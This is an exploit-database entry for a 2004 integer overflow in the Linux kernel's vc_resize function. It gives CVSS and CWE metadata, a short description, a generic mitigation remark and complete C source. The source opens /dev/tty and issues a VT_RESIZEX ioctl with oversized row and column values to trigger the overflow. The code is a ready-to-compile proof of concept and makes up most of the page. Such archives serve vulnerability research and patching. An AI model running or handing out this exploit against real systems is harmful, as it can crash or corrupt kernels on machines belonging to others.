vc_resize int overflow

vendor:

by:

Georgi Guninski

5.5

CVSS

MEDIUM

Integer Overflow

190

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Linux

2004

This exploit takes advantage of an integer overflow vulnerability in the vc_resize function. By setting specific values for the vv.v_rows and vv.v_cols variables, an overflow occurs on i386 systems, leading to a potential security breach. The exploit uses the open system call to open the /dev/tty device, and then utilizes the ioctl function with the VT_RESIZEX command to trigger the vulnerability. The code also includes a sync system call to ensure that all pending disk writes are completed before the exploit is executed. Finally, a while loop is used to print the ;) character multiple times. This exploit was published on milw0rm.com on December 16, 2004.

Mitigation:

To mitigate this vulnerability, it is recommended to apply patches or updates provided by the vendor. Additionally, restricting access to the vulnerable function or device may also help prevent exploitation.

Source

Exploit-DB raw data:

/* vc_resize int overflow
 * Copyright Georgi Guninski
 * Cannot be used in vulnerability databases
 * */
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <linux/vt.h>
#include <sys/vt.h>
#include <sys/ioctl.h>
#include <string.h>
#include <unistd.h>

int main(int ac, char **av)
{
int fd;
struct vt_consize vv;
int cou=4242;

fd=open("/dev/tty",O_RDWR);
if (fd<0) {perror("open");return -42;}
memset(&vv,0,sizeof(vv));
vv.v_clin=0;
vv.v_vcol=0;
vv.v_ccol=0;

/* magic values, overflow on i386*/
vv.v_rows=65535;
vv.v_cols=32769;

system("sync");
if (ioctl(fd,VT_RESIZEX,&vv) < 0) {perror("ioctl");return -4242;}
while(cou--) printf(";)\n");
close(fd);
return 42;
}

// milw0rm.com [2004-12-16]